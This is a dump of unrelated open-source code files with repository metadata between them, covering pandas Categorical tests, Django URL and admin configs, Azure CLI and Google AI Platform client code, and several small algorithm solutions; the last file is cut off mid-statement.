tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([1, 1, 2, 2], categories=[3, 2, 1])
exp = Categorical([1, 2], categories=[1, 2])
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
c = Categorical([3, 1, 2, 2, 1], categories=[3, 2, 1], ordered=True)
# Categorical.unique keeps categories order if ordered=True
exp = Categorical([3, 1, 2], categories=[3, 2, 1], ordered=True)
tm.assert_categorical_equal(c.unique(), exp)
tm.assert_index_equal(Index(c).unique(), Index(exp))
tm.assert_categorical_equal(Series(c).unique(), exp)
def test_shift(self):
# GH 9416
cat = Categorical(["a", "b", "c", "d", "a"])
# shift forward
sp1 = cat.shift(1)
xp1 = Categorical([np.nan, "a", "b", "c", "d"])
tm.assert_categorical_equal(sp1, xp1)
tm.assert_categorical_equal(cat[:-1], sp1[1:])
# shift back
sn2 = cat.shift(-2)
xp2 = Categorical(
["c", "d", "a", np.nan, np.nan], categories=["a", "b", "c", "d"]
)
tm.assert_categorical_equal(sn2, xp2)
tm.assert_categorical_equal(cat[2:], sn2[:-2])
# shift by zero
tm.assert_categorical_equal(cat, cat.shift(0))
def test_nbytes(self):
cat = Categorical([1, 2, 3])
exp = 3 + 3 * 8 # 3 int8s for values + 3 int64s for categories
assert cat.nbytes == exp
def test_memory_usage(self):
cat = Categorical([1, 2, 3])
# .categories is an index, so we include the hashtable
assert 0 < cat.nbytes <= cat.memory_usage()
assert 0 < cat.nbytes <= cat.memory_usage(deep=True)
cat = Categorical(["foo", "foo", "bar"])
assert cat.memory_usage(deep=True) > cat.nbytes
if not PYPY:
# sys.getsizeof will call the .memory_usage with
# deep=True, and add on some GC overhead
diff = cat.memory_usage(deep=True) - sys.getsizeof(cat)
assert abs(diff) < 100
def test_map(self):
c = Categorical(list("ABABC"), categories=list("CBA"), ordered=True)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("cba"), ordered=True)
tm.assert_categorical_equal(result, exp)
c = Categorical(list("ABABC"), categories=list("ABC"), ordered=False)
result = c.map(lambda x: x.lower())
exp = Categorical(list("ababc"), categories=list("abc"), ordered=False)
tm.assert_categorical_equal(result, exp)
result = c.map(lambda x: 1)
# GH 12766: Return an index not an array
tm.assert_index_equal(result, Index(np.array([1] * 5, dtype=np.int64)))
@pytest.mark.parametrize("value", [1, "True", [1, 2, 3], 5.0])
def test_validate_inplace_raises(self, value):
cat = Categorical(["A", "B", "B", "C", "A"])
msg = (
'For argument "inplace" expected type bool, '
f"received type {type(value).__name__}"
)
with pytest.raises(ValueError, match=msg):
cat.set_ordered(value=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_ordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.as_unordered(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.set_categories(["X", "Y", "Z"], rename=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.rename_categories(["X", "Y", "Z"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.reorder_categories(["X", "Y", "Z"], ordered=True, inplace=value)
with pytest.raises(ValueError, match=msg):
cat.add_categories(new_categories=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
cat.remove_categories(removals=["D", "E", "F"], inplace=value)
with pytest.raises(ValueError, match=msg):
with tm.assert_produces_warning(FutureWarning):
# issue #37643 inplace kwarg deprecated
cat.remove_unused_categories(inplace=value)
with pytest.raises(ValueError, match=msg):
cat.sort_values(inplace=value)
| [
"[email protected]"
] | |
a7eaaf704b1ca43d729d3db96987a74947dc2a7e | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/dashboards/admin/networks/urls.py | 4cd1b60079c3d722609128d7ad46956075f117f1 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,206 | py |
# Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import include
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.networks.agents \
import views as agent_views
from openstack_dashboard.dashboards.admin.networks.ports \
import urls as port_urls
from openstack_dashboard.dashboards.admin.networks.ports \
import views as port_views
from openstack_dashboard.dashboards.admin.networks.subnets \
import urls as subnet_urls
from openstack_dashboard.dashboards.admin.networks.subnets \
import views as subnet_views
from openstack_dashboard.dashboards.admin.networks import views
NETWORKS = r'^(?P<network_id>[^/]+)/%s$'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^create/$', views.CreateView.as_view(), name='create'),
url(NETWORKS % 'update', views.UpdateView.as_view(), name='update'),
url(NETWORKS % 'detail', views.DetailView.as_view(), name='detail'),
url(NETWORKS % 'agents/add',
agent_views.AddView.as_view(), name='adddhcpagent'),
url(NETWORKS % 'subnets/create',
subnet_views.CreateView.as_view(), name='addsubnet'),
url(NETWORKS % 'ports/create',
port_views.CreateView.as_view(), name='addport'),
url(r'^(?P<network_id>[^/]+)/subnets/(?P<subnet_id>[^/]+)/update$',
subnet_views.UpdateView.as_view(), name='editsubnet'),
url(r'^(?P<network_id>[^/]+)/ports/(?P<port_id>[^/]+)/update$',
port_views.UpdateView.as_view(), name='editport'),
url(r'^subnets/', include(subnet_urls, namespace='subnets')),
url(r'^ports/', include(port_urls, namespace='ports')),
]
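# Illustrative reverse() lookups (added note; assumes the usual
# 'horizon:admin:networks' namespace used by openstack_dashboard):
#   reverse('horizon:admin:networks:detail', args=[network_id])
#   reverse('horizon:admin:networks:editport', args=[network_id, port_id])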
| [
"[email protected]"
] | |
3ca35f3537a824472f63b7833626c34abcf1e3e6 | befafdde28c285c049b924fa58ce6240a4ae8d3c | /python_solution/Backtracking/40_CombinationSumII.py | 3c2f5d5b703d0d38f2bbe30c891c104f20adad1e | [] | no_license | Dimen61/leetcode | 3364369bda2255b993581c71e2b0b84928e817cc | 052bd7915257679877dbe55b60ed1abb7528eaa2 | refs/heads/master | 2020-12-24T11:11:10.663415 | 2017-08-15T14:54:41 | 2017-08-15T14:54:41 | 73,179,221 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,530 | py |
class Solution(object):
def combinationSum2(self, candidates, target):
"""
:type candidates: List[int]
:type target: int
:rtype: List[List[int]]
"""
enable_lst = [False for i in range(target+1)]
enable_lst[0] = True
candidates.sort()
for i in range(target):
if enable_lst[i]:
for num in candidates:
if i+num <= target:
enable_lst[i+num] = True
if not enable_lst[target]: return []
tmp_result = []
def search(total, index, combs):
"""
:type total: int
:type index: int
:rtype: void
"""
if total == 0:
tmp_result.append(combs)
return
elif index >= len(candidates) or total < 0:
return
num = candidates[index]
if total-num >= 0 and enable_lst[total-num]:
search(total-num, index+1, combs+[num])
search(total, index+1, combs)
search(target, 0, [])
tmp_result.sort()
result = []
last = None
for item in tmp_result:
if not last:
last = item
result.append(item)
else:
if last != item:
last = item
result.append(item)
        return result
| [
"[email protected]"
] | |
8c951a4ff5799e9f19a66c7679c2cbb6760522b1 | 593ecc21a7164ec293f23d75423e71ab3d9f3c54 | /LC29.py | 4851f8eb59c6ba7f464b3e832b78b17bb3b30c3a | [] | no_license | luckmimi/leetcode | e297c11960f0c72370523e5594d789bc4d55cf7c | 2257c6202e823a5cd71b630441c430f1bd08a896 | refs/heads/master | 2022-07-11T22:36:02.634148 | 2022-06-30T22:57:20 | 2022-06-30T22:57:20 | 214,880,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py |
class Solution:
def divide(self, dividend: int, divisor: int) -> int:
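        # Illustrative behavior (added note): divide(10, 3) -> 3 and
        # divide(7, -3) -> -2; divide(-2**31, -1) overflows and is clamped
        # to 2**31 - 1 by the final check.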
sign = -1 if (dividend < 0) ^ (divisor < 0) else 1
a = abs(dividend)
b = abs(divisor)
res = 0
while b<= a:
mul = 1
tmp = b
while a >= (tmp <<1):
tmp <<= 1
mul <<= 1
res += mul
a -= tmp
res *= sign
if res > 2**31 -1 :
return 2** 31 -1
else:
return res
| [
"[email protected]"
] | |
5fd1184dce2377d92e2ff473b987d718c97bf42f | 5bd3122d230471b048429f5e9c49a0b39c8a54fc | /Atcoder_contests/ARC/R102A.py | 5e0b5a9c7064494a2f9403dd114a77c4e8a54913 | [] | no_license | nao1412/Competitive_Programing_Codes | e230e2fa85027e41c5ee062083801bb299effe9b | 98c29b5ba75e75502cf27fcf365a7aedcd6c273c | refs/heads/main | 2023-06-05T18:45:59.733301 | 2021-06-23T15:02:25 | 2021-06-23T15:02:25 | 374,061,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py |
import sys
sys.setrecursionlimit(10**7)  # raise the recursion limit
import math
def I(): return int(input())
def LI(): return list(map(int, input().split()))
def MI(): return map(int, input().split())
def S(): return input()
def LS(): return list(map(str, input().split()))
def H(n): return [input() for i in range(n)]
mod = 10**9 + 7
def main():
n, k = MI()
if k % 2 == 0:
n1 = n // k
n2 = n1
if n % k >= k // 2:
n2 = n1 + 1
else:
n1 = n // k
n2 = 0
print(n1**3+n2**3)
if __name__ == '__main__':
main()
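# Why n1**3 + n2**3 (explanatory note, not in the original file): a+b, b+c and
# c+a must all be multiples of k, which forces a, b and c to share one residue
# r with 2*r % k == 0. r == 0 always works (n1 values in [1, n]); r == k//2
# also works when k is even (n2 values), giving the count n1**3 + n2**3.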
| [
"[email protected]"
] | |
b78816d355385165c2d46725802b6c6001eae314 | 48e124e97cc776feb0ad6d17b9ef1dfa24e2e474 | /Basic/chapter3/ReplaceTest.py | 1f7aca0428b31758f691b62156031c05dd93f421 | [] | no_license | hyperaeon/python | df75346040a5ccc588e21b0d761493c59e1a4fe3 | 21d10ef7af3227d29092a6720666c0db8e418ec4 | refs/heads/master | 2016-09-14T08:58:53.794960 | 2016-04-26T05:34:56 | 2016-04-26T05:34:56 | 57,100,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py |
__author__ = 'hyperaeon'
cookie = '_da_ntes_uid=3LhpAfObU48aiOR0b28yZYXv;'
cookie = cookie.replace(';','')
print(cookie)
list  # no-op bare expression; note the builtin name is reused as a variable below
type = 'a'
if type == 'a':
list = 'type a'
if type == 'b':
list = 'type b'
print(list)
| [
"[email protected]"
] | |
b7b297c84c0c3d1db89a06f2929ee93d987e0691 | eab1abf41e3e1bd276258be7aedfb4f2dfcc1b1e | /web/mydjango/geoapp/admin.py | 3d75606cf3e3ff9b2630865dc8782c03b65cc335 | [] | no_license | javiermaly/docker-python3-django2-postgres-postgis-geodjango-nginx | 1732e0df8d1bd4624b3385ac6757b48060814814 | 8ea5f2c9ed90013bab76b468d44e7cbabf8122f6 | refs/heads/master | 2021-11-25T14:47:09.901801 | 2018-03-26T01:03:39 | 2018-03-26T01:03:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py |
from django.contrib import admin
from .models import GeoAlgo
@admin.register(GeoAlgo)
class GeoAlgoAdmin(admin.ModelAdmin):
list_display = ['nombre']
    search_fields = ['nombre']
| [
"[email protected]"
] | |
3c0948318554ab6edf9a4f53a5192b3d04e696dd | a4ea525e226d6c401fdb87a6e9adfdc5d07e6020 | /src/azure-cli/azure/cli/command_modules/network/aaz/profile_2018_03_01_hybrid/network/vnet_gateway/_list_learned_routes.py | 789b238597180231c9dcdc90049d592a0ae04769 | [
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MPL-2.0",
"LGPL-2.1-only",
"Apache-2.0",
"LGPL-2.1-or-later",
"BSD-2-Clause"
] | permissive | Azure/azure-cli | 13340eeca2e288e66e84d393fa1c8a93d46c8686 | a40fd14ad0b6e89720a2e58d4d9be3a6ce1535ca | refs/heads/dev | 2023-08-17T06:25:37.431463 | 2023-08-17T06:00:10 | 2023-08-17T06:00:10 | 51,040,886 | 4,018 | 3,310 | MIT | 2023-09-14T11:11:05 | 2016-02-04T00:21:51 | Python | UTF-8 | Python | false | false | 6,877 | py |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
#
# Code generated by aaz-dev-tools
# --------------------------------------------------------------------------------------------
# pylint: skip-file
# flake8: noqa
from azure.cli.core.aaz import *
@register_command(
"network vnet-gateway list-learned-routes",
)
class ListLearnedRoutes(AAZCommand):
"""This operation retrieves a list of routes the virtual network gateway has learned, including routes learned from BGP peers.
:example: Retrieve a list of learned routes.
az network vnet-gateway list-learned-routes -g MyResourceGroup -n MyVnetGateway
"""
_aaz_info = {
"version": "2017-10-01",
"resources": [
["mgmt-plane", "/subscriptions/{}/resourcegroups/{}/providers/microsoft.network/virtualnetworkgateways/{}/getlearnedroutes", "2017-10-01"],
]
}
AZ_SUPPORT_NO_WAIT = True
def _handler(self, command_args):
super()._handler(command_args)
return self.build_lro_poller(self._execute_operations, self._output)
_args_schema = None
@classmethod
def _build_arguments_schema(cls, *args, **kwargs):
if cls._args_schema is not None:
return cls._args_schema
cls._args_schema = super()._build_arguments_schema(*args, **kwargs)
# define Arg Group ""
_args_schema = cls._args_schema
_args_schema.resource_group = AAZResourceGroupNameArg(
required=True,
)
_args_schema.name = AAZStrArg(
options=["-n", "--name"],
help="Name of the VNet gateway.",
required=True,
id_part="name",
)
return cls._args_schema
def _execute_operations(self):
self.pre_operations()
yield self.VirtualNetworkGatewaysGetLearnedRoutes(ctx=self.ctx)()
self.post_operations()
@register_callback
def pre_operations(self):
pass
@register_callback
def post_operations(self):
pass
def _output(self, *args, **kwargs):
result = self.deserialize_output(self.ctx.vars.instance, client_flatten=True)
return result
class VirtualNetworkGatewaysGetLearnedRoutes(AAZHttpOperation):
CLIENT_TYPE = "MgmtClient"
def __call__(self, *args, **kwargs):
request = self.make_request()
session = self.client.send_request(request=request, stream=False, **kwargs)
if session.http_response.status_code in [202]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
if session.http_response.status_code in [200]:
return self.client.build_lro_polling(
self.ctx.args.no_wait,
session,
self.on_200,
self.on_error,
lro_options={"final-state-via": "location"},
path_format_arguments=self.url_parameters,
)
return self.on_error(session.http_response)
@property
def url(self):
return self.client.format_url(
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworkGateways/{virtualNetworkGatewayName}/getLearnedRoutes",
**self.url_parameters
)
@property
def method(self):
return "POST"
@property
def error_format(self):
return "MgmtErrorFormat"
@property
def url_parameters(self):
parameters = {
**self.serialize_url_param(
"resourceGroupName", self.ctx.args.resource_group,
required=True,
),
**self.serialize_url_param(
"subscriptionId", self.ctx.subscription_id,
required=True,
),
**self.serialize_url_param(
"virtualNetworkGatewayName", self.ctx.args.name,
required=True,
),
}
return parameters
@property
def query_parameters(self):
parameters = {
**self.serialize_query_param(
"api-version", "2017-10-01",
required=True,
),
}
return parameters
@property
def header_parameters(self):
parameters = {
**self.serialize_header_param(
"Accept", "application/json",
),
}
return parameters
def on_200(self, session):
data = self.deserialize_http_content(session)
self.ctx.set_var(
"instance",
data,
schema_builder=self._build_schema_on_200
)
_schema_on_200 = None
@classmethod
def _build_schema_on_200(cls):
if cls._schema_on_200 is not None:
return cls._schema_on_200
cls._schema_on_200 = AAZObjectType()
_schema_on_200 = cls._schema_on_200
_schema_on_200.value = AAZListType()
value = cls._schema_on_200.value
value.Element = AAZObjectType()
_element = cls._schema_on_200.value.Element
_element.as_path = AAZStrType(
serialized_name="asPath",
flags={"read_only": True},
)
_element.local_address = AAZStrType(
serialized_name="localAddress",
flags={"read_only": True},
)
_element.network = AAZStrType(
flags={"read_only": True},
)
_element.next_hop = AAZStrType(
serialized_name="nextHop",
flags={"read_only": True},
)
_element.origin = AAZStrType(
flags={"read_only": True},
)
_element.source_peer = AAZStrType(
serialized_name="sourcePeer",
flags={"read_only": True},
)
_element.weight = AAZIntType(
flags={"read_only": True},
)
return cls._schema_on_200
class _ListLearnedRoutesHelper:
"""Helper class for ListLearnedRoutes"""
__all__ = ["ListLearnedRoutes"]
| [
"[email protected]"
] | |
e7d33cb382cca997ef56c3849ba3489bc73be785 | fd90b8efa1daaec44b54797e549e0f738f4a5897 | /jianzhioffer/16. 数值的整数次方.py | b6c886f4358eab1f50ae4aa820f45932b011e28a | [] | no_license | ddz-mark/LeetCode | 2a622eeb655398ca9ebd9feee93a52cd114a77c4 | d557faf87374ad8c65634ee9d9e572b88a54913a | refs/heads/master | 2021-07-12T06:58:57.162657 | 2021-04-18T13:25:03 | 2021-04-18T13:25:03 | 244,403,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py |
# Implement the function double Power(double base, int exponent), which computes base raised to the power exponent. Do not use library functions, and big-number overflow does not need to be handled.
#
# Example 1:
#
# Input: 2.00000, 10
# Output: 1024.00000
# Example 2:
#
# Input: 2.10000, 3
# Output: 9.26100
# Example 3:
#
# Input: 2.00000, -2
# Output: 0.25000
# Explanation: 2^-2 = 1/2^2 = 1/4 = 0.25
# Approach 1: optimize by splitting the exponent into even and odd cases; when it is even, x = x*x
# Parity test: (m+n) & 1 is 0 when (m+n) is even and 1 when it is odd
# Recursive idea: reduce the exponent step by step from the end, for example:
# when n is odd: return x * getPow(x, n-1)
# when n is even: return getPow(x * x, n // 2)
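# Worked example of the recursion (added note): getPow(x, 10) -> getPow(x*x, 5)
# -> x^2 * getPow(x^2, 4) -> x^2 * getPow(x^4, 2) -> x^2 * getPow(x^8, 1),
# i.e. x^10 = x^2 * x^8, using O(log n) multiplications.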
class Solution(object):
def myPow(self, x, n):
"""
:type x: float
:type n: int
:rtype: float
"""
        # 1. Iterative version
# n_temp = abs(n)
# sum = 1
# while n_temp > 1:
#
        # if n_temp & 1 == 0: # even
# x = x * x
# n_temp = n_temp // 2
# else:
# sum = sum * x
# n_temp -= 1
# sum = sum * x
#
# if n < 0:
# return 1 / sum
# elif n ==0:
# return 1
# return sum
        # 2. Recursive version
if n == 0:
return 1
elif n > 0:
return self.getPow(x, n)
else:
return self.getPow(1/x, -n)
def getPow(self, x, n):
        # Recursion: write the termination (base) case first
if n == 1:
return x
        if n & 1 == 0:  # even
return self.getPow(x * x, n // 2)
else:
return x * self.getPow(x, n-1)
if __name__ == '__main__':
ob = Solution()
print(ob.myPow(2.0, 3))
| [
"[email protected]"
] | |
a30be694eca63a88eff2b727822bab6367cf71fe | d0dfd680e92e9b32f24e6e034571ad4323a58103 | /src/yeahml/information/write_info.py | e25421e67c2746d55a8337851f10397129d59851 | [
"Apache-2.0"
] | permissive | yeahml/yeahml | 6d1523d01300532f19c54d8e9c320420df66ee5c | b51faff6625db5980151a4a5fac7bb49313df5c1 | refs/heads/master | 2023-08-11T16:49:41.181953 | 2020-11-14T20:33:58 | 2020-11-14T20:33:58 | 137,613,449 | 4 | 1 | Apache-2.0 | 2023-06-02T18:45:48 | 2018-06-16T22:11:19 | Python | UTF-8 | Python | false | false | 1,138 | py |
import json
import pathlib
from typing import Any, Dict
def write_build_information(
model_cdict: Dict[str, Any], meta_cdict: Dict[str, Any]
) -> bool:
full_exp_path = (
pathlib.Path(meta_cdict["yeahml_dir"])
.joinpath(meta_cdict["data_name"])
.joinpath(meta_cdict["experiment_name"])
)
json_path = pathlib.Path(full_exp_path).joinpath("info.json")
data_to_write = {}
KEYS_TO_WRITE = ["model_hash"]
if pathlib.Path(json_path).exists():
with open(json_path) as json_file:
data = json.load(json_file)
for k in KEYS_TO_WRITE:
if not k == "model_hash" and not meta_cdict["name_overwrite"]:
assert (
data[k] == model_cdict[k]
), f"info at {json_path} already contains the same values for keys {k}, but {json_path}={data[k]} and model config = {model_cdict[k]}\n > possible solution: change the name of the current model?"
for k in KEYS_TO_WRITE:
data_to_write[k] = model_cdict[k]
with open(json_path, "w") as outfile:
json.dump(data_to_write, outfile)
return True
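# Illustrative effect (hypothetical values, added note): with
# meta_cdict = {"yeahml_dir": "yeahml", "data_name": "mnist",
# "experiment_name": "trial_00", ...} this writes
# {"model_hash": model_cdict["model_hash"]} to yeahml/mnist/trial_00/info.json.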
| [
"[email protected]"
] | |
f60472dc9f2c47ee9077d7de07554b3dae6f0215 | 5c72f7709e501bd0ca3c5dc1e1f21cfffda13582 | /rebench/model/measurement.py | 40af4d69df6564115af83afce35a6769e7585c55 | [] | no_license | lhoste-bell/ReBench | 74ccb400aa5f262b56659afac3b7db873bd6a8d2 | 0f5c678b045b5208e9a2bed01629c780bef52da5 | refs/heads/master | 2021-01-17T07:57:14.440676 | 2016-05-23T19:25:58 | 2016-05-23T19:25:58 | 60,706,933 | 0 | 0 | null | 2016-06-08T15:06:26 | 2016-06-08T15:06:25 | null | UTF-8 | Python | false | false | 2,563 | py |
# Copyright (c) 2009-2014 Stefan Marr <http://www.stefan-marr.de/>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from datetime import datetime
from .run_id import RunId
class Measurement(object):
def __init__(self, value, unit, run_id, criterion = 'total',
timestamp = None):
self._run_id = run_id
self._criterion = criterion
self._value = value
self._unit = unit
self._timestamp = timestamp or datetime.now()
def is_total(self):
return self._criterion == 'total'
@property
def criterion(self):
return self._criterion
@property
def value(self):
return self._value
@property
def unit(self):
return self._unit
@property
def timestamp(self):
return self._timestamp
@property
def run_id(self):
return self._run_id
TIME_FORMAT = "%Y-%m-%dT%H:%M:%S"
def as_str_list(self):
return ["[" + self._timestamp.strftime(self.TIME_FORMAT) + "]",
"%f" % self._value,
self._unit,
self._criterion] + self._run_id.as_str_list()
@classmethod
def from_str_list(cls, data_store, str_list):
timestamp = datetime.strptime(str_list[0][1:-1], cls.TIME_FORMAT)
value = float(str_list[1])
unit = str_list[2]
criterion = str_list[3]
run_id = RunId.from_str_list(data_store, str_list[4:])
return Measurement(value, unit, run_id, criterion, timestamp)
| [
"[email protected]"
] | |
ce4e263dde23b1fdcc64494a2f9403ddfdfb1d07 | f5f40cee05de885ee059bcf4760e16f3f01ed23c | /ims/exceptions.py | c359b0a8626603fd8084e35af12b1dcce84a8c5e | [] | no_license | MarsWizard/imagebank | 68693207d71024bd0cdc608984d80fc0c7b6f751 | 916a9f087194052e77751fd8d52c930e77a7b04d | refs/heads/master | 2021-04-17T16:57:55.356760 | 2020-10-20T05:34:23 | 2020-10-20T05:34:23 | 249,460,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 452 | py |
ERROR_OBJECT_NOT_FOUND = 10001
PARAMETER_REQUIRED = 10002
INVALID_IMAGE_FILE = 10003
class ImsException(BaseException):
def __init__(self, error_code, error_msg):
self.error_code = error_code
self.error_msg = error_msg
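# Illustrative handling (added note, not part of the original file):
#   try:
#       raise InvalidImageFile()
#   except ImsException as e:
#       print(e.error_code, e.error_msg)   # 10003 Invalid Image File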
class InvalidImageFile(ImsException):
def __init__(self):
super(InvalidImageFile, self).__init__(INVALID_IMAGE_FILE,
                                                'Invalid Image File')
| [
"[email protected]"
] | |
477f89560ab67fce9dddcc436863915129dc25bd | 707bd0e873ae25146f1341b40d8efbf5134025af | /unifypage/migrations/0004_auto_20161021_0933.py | 781e95f7baa886a438135233d4469070f9415423 | [] | no_license | yosmangel/djangoLn2x | 76acd748adfddb5b21ad3e0342e3d7eb19b81bc9 | 24d068458e8271aacfa98d762c0dc117e65d41cf | refs/heads/master | 2021-04-27T07:55:36.488176 | 2017-06-01T17:48:26 | 2017-06-01T17:48:26 | 122,641,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 600 | py |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-21 08:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('unifypage', '0003_auto_20161020_1746'),
]
operations = [
migrations.RemoveField(
model_name='row',
name='background_url',
),
migrations.AddField(
model_name='row',
name='background',
field=models.CharField(blank=True, max_length=500, verbose_name='Background'),
),
]
| [
"[email protected]"
] | |
f2b7180d176b4eec46c3794ea9526f5ec48beb91 | 228ebc9fb20f25dd3ed2a6959aac41fd31314e64 | /google/cloud/aiplatform_v1beta1/services/migration_service/transports/base.py | 3405e5f21603a2bae9a6b0b1b8a675b832545a71 | [
"Apache-2.0"
] | permissive | orionnye/python-aiplatform | 746e3df0c75025582af38223829faeb2656dc653 | e3ea683bf754832340853a15bdb0a0662500a70f | refs/heads/main | 2023-08-03T06:14:50.689185 | 2021-09-24T03:24:14 | 2021-09-24T03:24:14 | 410,091,957 | 1 | 0 | Apache-2.0 | 2021-09-24T20:21:01 | 2021-09-24T20:21:00 | null | UTF-8 | Python | false | false | 7,763 | py |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Dict, Optional, Sequence, Union
import packaging.version
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from google.cloud.aiplatform_v1beta1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-aiplatform",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
try:
# google.auth.__version__ was added in 1.26.0
_GOOGLE_AUTH_VERSION = google.auth.__version__
except AttributeError:
try: # try pkg_resources if it is available
_GOOGLE_AUTH_VERSION = pkg_resources.get_distribution("google-auth").version
except pkg_resources.DistributionNotFound: # pragma: NO COVER
_GOOGLE_AUTH_VERSION = None
class MigrationServiceTransport(abc.ABC):
"""Abstract transport class for MigrationService."""
AUTH_SCOPES = ("https://www.googleapis.com/auth/cloud-platform",)
DEFAULT_HOST: str = "aiplatform.googleapis.com"
def __init__(
self,
*,
host: str = DEFAULT_HOST,
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
scopes_kwargs = self._get_scopes_kwargs(self._host, scopes)
# Save the scopes.
self._scopes = scopes
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise core_exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = google.auth.load_credentials_from_file(
credentials_file, **scopes_kwargs, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = google.auth.default(
**scopes_kwargs, quota_project_id=quota_project_id
)
        # If the credentials are service account credentials, then always try to use a self-signed JWT.
if (
always_use_jwt_access
and isinstance(credentials, service_account.Credentials)
